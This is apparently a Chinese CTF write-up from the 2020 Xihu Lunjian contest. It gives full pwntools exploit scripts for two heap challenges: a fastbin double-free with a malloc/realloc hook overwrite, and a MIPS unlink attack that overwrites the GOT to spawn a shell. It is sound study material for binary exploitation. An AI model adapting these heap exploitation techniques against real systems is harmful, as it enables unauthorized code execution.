登录后台

页面导航

2020安恒西湖论剑

mmutag

onegadget攻击realloc_hook

#coding:utf-8
from pwn import *
context.log_level = 'debug'
debug = 1
elf = ELF('mmutag')

if debug:
    sh = process('./mmutag')
    libc = elf.libc
else:
    sh = remote('127.0.0.1', 10000)
    libc = ELF('libc.so.6')


def save(introduce):
    sh.sendlineafter('choice:\n\n',str(1))
    sh.recvuntil('introduce \n')
    sh.send(str(introduce))
def introduce():
    sh.sendlineafter('choice:\n\n',str(2))
def add(idx,content):
    sh.sendlineafter('choise:\n',str(1))
    sh.recvuntil('id:\n')
    sh.sendline(str(idx))
    sh.recvuntil('content\n')
    sh.send(str(content))
def delete(idx):
    sh.sendlineafter('choise:\n',str(2))
    sh.recvuntil('id:\n')
    sh.sendline(str(idx))
def exit(content):
    sh.sendlineafter('choise:\n',str(3))
    sh.send(str(content))
sh.recvuntil('name: \n')
sh.sendline('a')
sh.recvuntil('tag: ')
stack_addr = int(sh.recv(14),16)
log.success('stack_addr: '+hex(stack_addr))

introduce()
#
add(1,'a'*0x20)
add(2,'a'*0x20)
add(3,'a'*0x20)
delete(1)
delete(2)
delete(1)
add(4,p64(stack_addr-0x40))
add(5,'a'*0x20)
add(6,'a'*0x20)
#
one = [0x45226,0x4527a,0xf0364,0xf1207]
exit(p64(0)+p64(0x71)+p64(stack_addr-0x40))
add(7,'a'*0x48)
exit('a'*0x10)
libc_base  = u64(sh.recv(0x70)[0x66:0x6c].ljust(8,'\x00')) - 0x20840
log.success('libc_base: '+hex(libc_base)) 
exit(p64(0)+p64(0x71)+p64(libc_base+libc.symbols['__malloc_hook']-0x23))
add(8,'a'*0x48)
add(9,'a'*11+p64(libc_base+one[3])+p64(libc_base+libc.symbols['__libc_realloc']+0))
sh.sendlineafter('choise:\n',str(1))
sh.sendlineafter('id:\n',str(10))
sh.sendline('/bin/sh\x00')
#gdb.attach(sh)
sh.interactive()

managesystem

mips的堆题,edit的时候可以溢出8个字节

image-20201029140710473

调试的时候报错

qemu: uncaught target signal 11 (Segmentation fault) - core dumped

换成题目指定的libc.so.0库就可以了

最后写got表的时候,写puts不行,写free函数的可以

from pwn import *
import sys
context.binary = "./managesystem"
binary = './managesystem'

if sys.argv[1] == "r":
    p = remote("127.0.0.1", 1234)
elif sys.argv[1] == "l":
    p = process(["qemu-mipsel", "-L", "/home/at0de/Desktop/mipspwn", binary])
else:
    p = process(["qemu-mipsel", "-g", "1234", "-L", "/home/at0de/Desktop/mipspwn", binary])

elf = ELF("./managesystem")
libc = ELF("libc.so.0")
context.log_level = "debug"

def add(size,info):
    p.sendlineafter('options >> \n','1')
    p.sendlineafter('length: \n',str(size))
    p.sendafter('info: \n',str(info))

def delete(idx):
    p.sendlineafter('options >> \n','2')
    p.sendlineafter('user: \n',str(idx))

def edit(idx,info):
    p.sendlineafter('options >> \n','3')
    p.sendlineafter('edit: \n',str(idx))
    p.sendafter('info: \n',str(info))
def show(idx):
    p.sendlineafter('options >> \n','4')
    p.sendlineafter('show: \n',str(idx))
note_list = 0x411830
add(0x20,'a'*0x20)
add(0x18,'a'*0x18)
edit(0,p32(0)+p32(0x21)+p32(note_list-0xc)+p32(note_list-0x8)+'a'*0x10+p32(0x20)+p32(0x20))
delete(1)
edit(0,p32(0)*2+p32(0x411830)+p32(0x20)+p32(elf.got['puts'])+p32(0x4))
show(1)
p.recvuntil('info: ')
libc_base = u32(p.recv(4)) - libc.symbols['puts']
log.success('libc_base: '+hex(libc_base))
edit(0,p32(0x411830)+p32(0x20)+p32(elf.got['free'])+p32(0x4)+p32(libc_base+libc.search('/bin/sh').next()))
edit(1,p32(libc_base+libc.symbols['system']))
delete(2)
p.interactive()